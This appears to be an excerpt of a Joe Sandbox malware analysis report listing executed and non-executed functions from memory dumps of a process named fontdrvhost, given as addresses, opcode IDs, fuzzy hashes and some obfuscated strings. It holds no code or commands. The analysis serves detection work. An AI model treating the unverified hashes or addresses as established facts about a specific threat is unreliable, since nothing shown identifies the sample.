                                                                                            • Opcode ID: 86d4c5aafb65cb0f4c82865f1148223fef06a13b511ba5efa7967910edc7dbc1
                                                                                            • Instruction ID: 67cfd17df778f58ef89a316eba3f5d398a48e2a7b3a2bb485fa555b20bf7e0f8
                                                                                            • Opcode Fuzzy Hash: 86d4c5aafb65cb0f4c82865f1148223fef06a13b511ba5efa7967910edc7dbc1
                                                                                            • Instruction Fuzzy Hash: 0E712070A1994E8FDB45FF68C495AEAB7B1FF58300F1445B5D40DD7296CE34A882CB90
                                                                                            Function 00007FFB4B294380 Relevance: .2, Instructions: 211COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002F.00000002.1870101240.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_47_2_7ffb4b290000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e6d4e55e3786ed29683e95006624e88697149119d94854d8ba1a08c76a31c668
                                                                                            • Instruction ID: e5c2840df0516a819344397e1a3a63fb9c9e6574a8fa948d9d20721f8c1d9c4b
                                                                                            • Opcode Fuzzy Hash: e6d4e55e3786ed29683e95006624e88697149119d94854d8ba1a08c76a31c668
                                                                                            • Instruction Fuzzy Hash: FE6126D6E1DECA0BF365BE7CD9110B57FB0EF51314B1880B6E59C861E7E91868058291
                                                                                            Function 00007FFB4B2908B1 Relevance: .2, Instructions: 210COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002F.00000002.1870101240.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_47_2_7ffb4b290000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 85bb6ebe230c3bd84c9a450a1496b582d6d8037313243844264a5fe8f1be3746
                                                                                            • Instruction ID: 971664e7f1fa040f8645a22234c2d658e00c5730e8dc7ab8d870f828219eb992
                                                                                            • Opcode Fuzzy Hash: 85bb6ebe230c3bd84c9a450a1496b582d6d8037313243844264a5fe8f1be3746
                                                                                            • Instruction Fuzzy Hash: 8B618CB1A08A4E8FEB98FF78C8546AABBB1FF59301F4441BAD50DD71A1CA34A841C740
                                                                                            Function 00007FFB4B294F5C Relevance: .2, Instructions: 193COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002F.00000002.1870101240.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_47_2_7ffb4b290000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f6ab34938cbc1a25cf05912b17077070e05aa6018b3d13f8a6cf2498c1011dbf
                                                                                            • Instruction ID: 37d8bf80ff8b5893fc72e26cd4c3635a9303377cc987ffb69de0c212f4fcb06f
                                                                                            • Opcode Fuzzy Hash: f6ab34938cbc1a25cf05912b17077070e05aa6018b3d13f8a6cf2498c1011dbf
                                                                                            • Instruction Fuzzy Hash: 2D71E570909A2D8FDBA5EF58C894BE9BBB1FB58301F5001AAD40DE3251CB35AA84CF40
                                                                                            Function 00007FFB4B2960C5 Relevance: .2, Instructions: 183COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002F.00000002.1870101240.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_47_2_7ffb4b290000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e6a704edf074868f5b3f9a28bb705a4b9170f991e3149592c3064ef566645e91
                                                                                            • Instruction ID: 9d11d1c58f4a624b091f2ef6b51baf11e863063be56ef47ce1a0552d2cf2f7c1
                                                                                            • Opcode Fuzzy Hash: e6a704edf074868f5b3f9a28bb705a4b9170f991e3149592c3064ef566645e91
                                                                                            • Instruction Fuzzy Hash: 97619CB1A0D65D8FEB96FF68C9957A9BBF1FF55300F0481BAC10D932A2CA385945CB40
                                                                                            Function 00007FFB4B294611 Relevance: .2, Instructions: 178COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002F.00000002.1870101240.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_47_2_7ffb4b290000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7d545810b8717c2c4cdcb85687f87ab7fd05c13e6eaa1c36f6a745e8c4274407
                                                                                            • Instruction ID: cde1cf7d386e1c5d18015a94e7dcfc0ee061b981320201c34eb142c375dd1cc5
                                                                                            • Opcode Fuzzy Hash: 7d545810b8717c2c4cdcb85687f87ab7fd05c13e6eaa1c36f6a745e8c4274407
                                                                                            • Instruction Fuzzy Hash: 7761A5B0A18A1D8FDB94EFA8D855BEDBBB1FF59301F100169D40DE7291CA746881CB40
                                                                                            Function 00007FFB4B290AB9 Relevance: .2, Instructions: 159COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002F.00000002.1870101240.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_47_2_7ffb4b290000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9858f3a1d9fbe634691517fb6bc7cdabad9e2a32bc3c4d42161f8bbbdf4803cd
                                                                                            • Instruction ID: 201ec22ee353cbbb9ff7fd9869e4e83c570cedb6c1a53c29f43924768d5c08d7
                                                                                            • Opcode Fuzzy Hash: 9858f3a1d9fbe634691517fb6bc7cdabad9e2a32bc3c4d42161f8bbbdf4803cd
                                                                                            • Instruction Fuzzy Hash: 6051B6B1A18A5D8FDB98EFA8C8546EDBBB2FB98301F14412AD50DE7295CB345845CB40
                                                                                            Function 00007FFB4B2938B8 Relevance: .2, Instructions: 151COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002F.00000002.1870101240.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_47_2_7ffb4b290000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 74628e0260009f2a801d9a2c61e65c36ff38436c858361401ff896966cfaf25d
                                                                                            • Instruction ID: a6d3f10478d615ecebfd3786f303fa6276ec2dff0254fb11326eb3161844fcfc
                                                                                            • Opcode Fuzzy Hash: 74628e0260009f2a801d9a2c61e65c36ff38436c858361401ff896966cfaf25d
                                                                                            • Instruction Fuzzy Hash: AA419AB1A1891D8FDB55EFA8D851AEEBBF1FF58300F10017AE40DE7295DA34A9018B51
                                                                                            Function 00007FFB4B2967ED Relevance: .1, Instructions: 142COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002F.00000002.1870101240.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_47_2_7ffb4b290000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 321ac1e08239bff7fac84b3e2917bdf65bc508e82967751c66dda906d58a17d5
                                                                                            • Instruction ID: f23431e7a0d8dae984203265c1f2eba93071e2271146d110dfc72c657bc2d927
                                                                                            • Opcode Fuzzy Hash: 321ac1e08239bff7fac84b3e2917bdf65bc508e82967751c66dda906d58a17d5
                                                                                            • Instruction Fuzzy Hash: A051897190D2898FEB56AF78C8652FE7FF0FF06300F0545BAD548E71A2DA285A48CB51
                                                                                            Function 00007FFB4B290C6D Relevance: .1, Instructions: 125COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002F.00000002.1870101240.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_47_2_7ffb4b290000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: baf4aaa42ef4f71c1108a5467df425d5859d5e3931525b888cd7cd968c65788e
                                                                                            • Instruction ID: acc3d9ef9f9bd59e7fe2033da0fbf00cfd133db8f07a9b66e5788583b26d3473
                                                                                            • Opcode Fuzzy Hash: baf4aaa42ef4f71c1108a5467df425d5859d5e3931525b888cd7cd968c65788e
                                                                                            • Instruction Fuzzy Hash: 14410671D0961D8FDB51EFB8D4846EEBBB0FF19300F50056AE40DE3292DA78A945CB90
                                                                                            Function 00007FFB4B291521 Relevance: .1, Instructions: 120COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002F.00000002.1870101240.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_47_2_7ffb4b290000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: bf788fbede743f0de0512d95c296e90d717203a3b7affd9e45bfa3f16efb612a
                                                                                            • Instruction ID: 4ef6a42d80b2563c0416e1e240949cf01da11c28a2653c325da86dcda20d22e0
                                                                                            • Opcode Fuzzy Hash: bf788fbede743f0de0512d95c296e90d717203a3b7affd9e45bfa3f16efb612a
                                                                                            • Instruction Fuzzy Hash: 3641D674A1891D8FDB98EF68C895BECB7F1FB58305F5480A9904EE3691CE74A8918B40
                                                                                            Function 00007FFB4B290AD0 Relevance: .1, Instructions: 113COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002F.00000002.1870101240.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_47_2_7ffb4b290000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: bcb022a2cececc8c2eee81daff7876487d99c1f5d7e04d077b1434f4363902f9
                                                                                            • Instruction ID: f252e8983d6964747f33860c4f67401cf51fc005357b155477667c97e771c557
                                                                                            • Opcode Fuzzy Hash: bcb022a2cececc8c2eee81daff7876487d99c1f5d7e04d077b1434f4363902f9
                                                                                            • Instruction Fuzzy Hash: F631A971A1891D8FDF94EF68C855AEEBBB2FB98305F10412AD50DE7295CB349845CB80
                                                                                            Function 00007FFB4B294BE9 Relevance: .1, Instructions: 103COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002F.00000002.1870101240.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_47_2_7ffb4b290000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: dc1de51fbb7697dcacc842ea9f233ba6d52f299a17354e25dcbde419ad86eabe
                                                                                            • Instruction ID: 8391eabe7e1b5eb8aa6860a11caac4060ed2d90cce9b74a731abd658fa92ebea
                                                                                            • Opcode Fuzzy Hash: dc1de51fbb7697dcacc842ea9f233ba6d52f299a17354e25dcbde419ad86eabe
                                                                                            • Instruction Fuzzy Hash: B6416BB0D096598FEB56EFB8C8556EDBBB1FF45301F4041BAD04DD72A2CA399881CB00
                                                                                            Function 00007FFB4B294535 Relevance: .1, Instructions: 103COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002F.00000002.1870101240.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_47_2_7ffb4b290000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: bedf9b70464897549315fff3fc3ab4df1b880bf1624e41d1a5098c857e738583
                                                                                            • Instruction ID: da929fa90c19dc9e7c7023901d8032415f43edbc53878961912afa68b770405c
                                                                                            • Opcode Fuzzy Hash: bedf9b70464897549315fff3fc3ab4df1b880bf1624e41d1a5098c857e738583
                                                                                            • Instruction Fuzzy Hash: CD3115A192DACA8FE761EF3CC8241E97FB0FF66214F4541BAE88C86197DA245845C391
                                                                                            Function 00007FFB4B291129 Relevance: .1, Instructions: 90COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002F.00000002.1870101240.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_47_2_7ffb4b290000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9a34d68de1ebc78f4093c22c3b1e91f63bea0b951d72d4f960086a821584390a
                                                                                            • Instruction ID: 832eafc69c628ad4b489e99d5a3c43ca95cc132bc57e04114237bcc059d06b86
                                                                                            • Opcode Fuzzy Hash: 9a34d68de1ebc78f4093c22c3b1e91f63bea0b951d72d4f960086a821584390a
                                                                                            • Instruction Fuzzy Hash: C3215C71A08A5D9FDF81EF68D855AEDBBF1FF59311F00416AE40CE72A1CA2498518790
                                                                                            Function 00007FFB4B293F00 Relevance: .1, Instructions: 85COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002F.00000002.1870101240.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_47_2_7ffb4b290000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7848ea661771ea52e515bfb9509077c0baff1405c83130e15d5ad8556c1da141
                                                                                            • Instruction ID: 97ad693fea0aa82162d24f5769ebb80399cde5b4426a283f2cc793c9f80948dd
                                                                                            • Opcode Fuzzy Hash: 7848ea661771ea52e515bfb9509077c0baff1405c83130e15d5ad8556c1da141
                                                                                            • Instruction Fuzzy Hash: 35312B70E1961E8BE7A9EE24C5593B9B6B1EF54300F1045B9D95ED32A2CE38A981CB40
                                                                                            Function 00007FFB4B293F0B Relevance: .1, Instructions: 77COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002F.00000002.1870101240.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_47_2_7ffb4b290000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: db460cfbef28f519c99f2eeaec63ceb810f6bcb6ea523e390a65a4fa7e4befa4
                                                                                            • Instruction ID: f8ccc4b508fd9feb30b01204b3d99c2d410e9253d2c130c005ad3a5edc57d85b
                                                                                            • Opcode Fuzzy Hash: db460cfbef28f519c99f2eeaec63ceb810f6bcb6ea523e390a65a4fa7e4befa4
                                                                                            • Instruction Fuzzy Hash: 86218EB1E0D60E8AE768FF74C5456BA7BB1FF84310F1040B9D61E932E2DE38A941CA40
                                                                                            Function 00007FFB4B291048 Relevance: .1, Instructions: 74COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002F.00000002.1870101240.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_47_2_7ffb4b290000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ed0b046b4deaee06f0fac2b0bf564a56ceecaf6a7c0128ad75bbbdd7f66ca1c4
                                                                                            • Instruction ID: d36a10a55e00c8aa431aeff8533cbce924c646ce5e6e7fb44230eddff9c1a7cc
                                                                                            • Opcode Fuzzy Hash: ed0b046b4deaee06f0fac2b0bf564a56ceecaf6a7c0128ad75bbbdd7f66ca1c4
                                                                                            • Instruction Fuzzy Hash: E0219F74A1891D9FDF84EF98D495EEEBBB1FF68301F10416AE50AE3255CA34E8418B90
                                                                                            Function 00007FFB4B293F43 Relevance: .1, Instructions: 71COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002F.00000002.1870101240.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_47_2_7ffb4b290000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b8ac378c3598399455c827dd3aea8493c695b3fae5dbb1769060fb70f5701b53
                                                                                            • Instruction ID: 2cbb8e9473711337b284bbfcfc25e775c5bce4cb7bc51af1c4e8b65da2e82352
                                                                                            • Opcode Fuzzy Hash: b8ac378c3598399455c827dd3aea8493c695b3fae5dbb1769060fb70f5701b53
                                                                                            • Instruction Fuzzy Hash: 8D214C7090D68D4FEB69AB74C8197B97BB1EF45310F0401BAD50DD32A2DE2858458B51
                                                                                            Function 00007FFB4B293FC1 Relevance: .1, Instructions: 64COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002F.00000002.1870101240.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_47_2_7ffb4b290000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 2c6e6aa379fc5ea8d920437eb7090fcd5446bbb00e3a9ec90066765a0147e54b
                                                                                            • Instruction ID: 22484d6c994b4a7dcb89e3f2c7c6ffae2102df2f68070f17fbb3cf66aa772479
                                                                                            • Opcode Fuzzy Hash: 2c6e6aa379fc5ea8d920437eb7090fcd5446bbb00e3a9ec90066765a0147e54b
                                                                                            • Instruction Fuzzy Hash: F1117CB090E78E4EE76AAB74C8247B97FB1AF86310F0840BAD449D72D3CD289845CB51
                                                                                            Function 00007FFB4B293F62 Relevance: .1, Instructions: 63COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002F.00000002.1870101240.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_47_2_7ffb4b290000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: eace5bf40aa66447c42a3a0d214aa6e9d9f0545548c0ab9a42c77c83365a2380
                                                                                            • Instruction ID: 016d44eaccd8e2e302afb90e04135a442a1f01ac8e5833618a95ba2718047d97
                                                                                            • Opcode Fuzzy Hash: eace5bf40aa66447c42a3a0d214aa6e9d9f0545548c0ab9a42c77c83365a2380
                                                                                            • Instruction Fuzzy Hash: 8F118FB0E0DA0E8BE778BE38C5057BA7AB1EF95310F004579D51ED32E1DE38A8058A41
                                                                                            Function 00007FFB4B293F86 Relevance: .1, Instructions: 59COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002F.00000002.1870101240.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_47_2_7ffb4b290000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 3b765c1597dd40e82318b946504e24a564c21b3cbd0920e7601e0453bc26a12a
                                                                                            • Instruction ID: 680f3dd61b72f449587060f7a319087befbec145a2786fa3eac42999c7ea8491
                                                                                            • Opcode Fuzzy Hash: 3b765c1597dd40e82318b946504e24a564c21b3cbd0920e7601e0453bc26a12a
                                                                                            • Instruction Fuzzy Hash: 6C1160B0E0D64E8AF7B9FE38C5053B97AB1EF84300F149079D51E936E2DE39A841C604
                                                                                            Function 00007FFB4B293EEC Relevance: .1, Instructions: 56COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002F.00000002.1870101240.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_47_2_7ffb4b290000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 013e49c983b9b9b240bed0249f03cf27de3f150c139d6751ac6b008006311c69
                                                                                            • Instruction ID: 25086b20d61a8a33e273bd0eed20c6f48bf0309156533b7a8da397b57ed4a93c
                                                                                            • Opcode Fuzzy Hash: 013e49c983b9b9b240bed0249f03cf27de3f150c139d6751ac6b008006311c69
                                                                                            • Instruction Fuzzy Hash: 1E1151B0D0DB4E8FE769AF38C6193B97BB1AF45310F0450B9D51DD72E2DE2858418705
                                                                                            Function 00007FFB4B293F74 Relevance: .1, Instructions: 56COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002F.00000002.1870101240.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_47_2_7ffb4b290000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 1e5e5c806586d2195bdae55a7742e202a32be150b1c23969e6fff77a0b82a07c
                                                                                            • Instruction ID: 9a7a3085c16079d509b208c37fee3f7395990372d087cbaada7af5319b349639
                                                                                            • Opcode Fuzzy Hash: 1e5e5c806586d2195bdae55a7742e202a32be150b1c23969e6fff77a0b82a07c
                                                                                            • Instruction Fuzzy Hash: 6F1152B1E1DA4E8BF779BE78C5153B97AB1EF48310F144439D50ED36E1DE38A8418644
                                                                                            Function 00007FFB4B293F6B Relevance: .1, Instructions: 53COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002F.00000002.1870101240.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_47_2_7ffb4b290000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d36dfef8c394c5531509ef346a9dea2bfa5c2ba1f68f2ad077ef5e1ff1b3cdf6
                                                                                            • Instruction ID: 8e20aedd19b96c1435a48060136c8e4d07da74690eded75368a15405aca5c358
                                                                                            • Opcode Fuzzy Hash: d36dfef8c394c5531509ef346a9dea2bfa5c2ba1f68f2ad077ef5e1ff1b3cdf6
                                                                                            • Instruction Fuzzy Hash: 84018EB090E64A8FE769AF34C5153B97BB1EF45300F044479D40ED32D2DE38A8419705
                                                                                            Function 00007FFB4B296680 Relevance: .0, Instructions: 50COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002F.00000002.1870101240.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_47_2_7ffb4b290000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 776b8de60f8673a3830aea06bac8bf7fe20f66750cf5b17b16015de4ce7917ac
                                                                                            • Instruction ID: 83dc65979a941f3d61a889400e0c84ccaa176374988a420fc9195dd0fe4891ca
                                                                                            • Opcode Fuzzy Hash: 776b8de60f8673a3830aea06bac8bf7fe20f66750cf5b17b16015de4ce7917ac
                                                                                            • Instruction Fuzzy Hash: BB01DC3194CA4C8BCB55AF2AAC002887BF4FB9E318F00126AD44CD7180D3369AAAC741
                                                                                            Function 00007FFB4B2910EA Relevance: .0, Instructions: 31COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002F.00000002.1870101240.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_47_2_7ffb4b290000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a9a03bad1181fd9156b5d4678743009ea65af1784cec314c7d573c3ced645715
                                                                                            • Instruction ID: 159c7463c4c73dca55b318604908a2fadff0c33113cffb6db9805751b64f75e8
                                                                                            • Opcode Fuzzy Hash: a9a03bad1181fd9156b5d4678743009ea65af1784cec314c7d573c3ced645715
                                                                                            • Instruction Fuzzy Hash: 0BE0683290CA8C5BDB90FE69E8066A5FFF0FBC5308F000069E65CD3091C2249565C380
                                                                                            Function 00007FFB4B2909D3 Relevance: .0, Instructions: 25COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002F.00000002.1870101240.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_47_2_7ffb4b290000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e3504408b11fa5a5560581a89978331f29428e0d57720e15dc6a351c603f5702
                                                                                            • Instruction ID: 6f38fa2e13220179f0073961d2bfb287e89a218c6803e9ee790b855d6002b9ea
                                                                                            • Opcode Fuzzy Hash: e3504408b11fa5a5560581a89978331f29428e0d57720e15dc6a351c603f5702
                                                                                            • Instruction Fuzzy Hash: B1E01A72A2891E4BEB84FEA8D8455EDB7B2FB84240B004025D10DE3161CA2068148780

                                                                                            Non-executed Functions

                                                                                            Function 00007FFB4B2957F2 Relevance: 6.5, Strings: 5, Instructions: 241COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002F.00000002.1870101240.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_47_2_7ffb4b290000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 0O3K$@O3K$PO3K$`O3K$pP3K
                                                                                            • API String ID: 0-2982639361
                                                                                            • Opcode ID: a18cdb2ac145b01a4c54f6b1d4c9c18a221e3c5258e12544c3b259fb364075d4
                                                                                            • Instruction ID: bf6c845be664aba54115205aefcfef9af8a6f95fe3f39f1a8869f068f18b694b
                                                                                            • Opcode Fuzzy Hash: a18cdb2ac145b01a4c54f6b1d4c9c18a221e3c5258e12544c3b259fb364075d4
                                                                                            • Instruction Fuzzy Hash: 07512787B0EBA60BF31676FCFC511D9AFA0EF812B574840B7D28CCA0A7A815494A43D1

                                                                                            Executed Functions

                                                                                            Function 00007FFB4B2A1EC3 Relevance: 16.5, Strings: 12, Instructions: 1538COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000030.00000002.1886149286.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
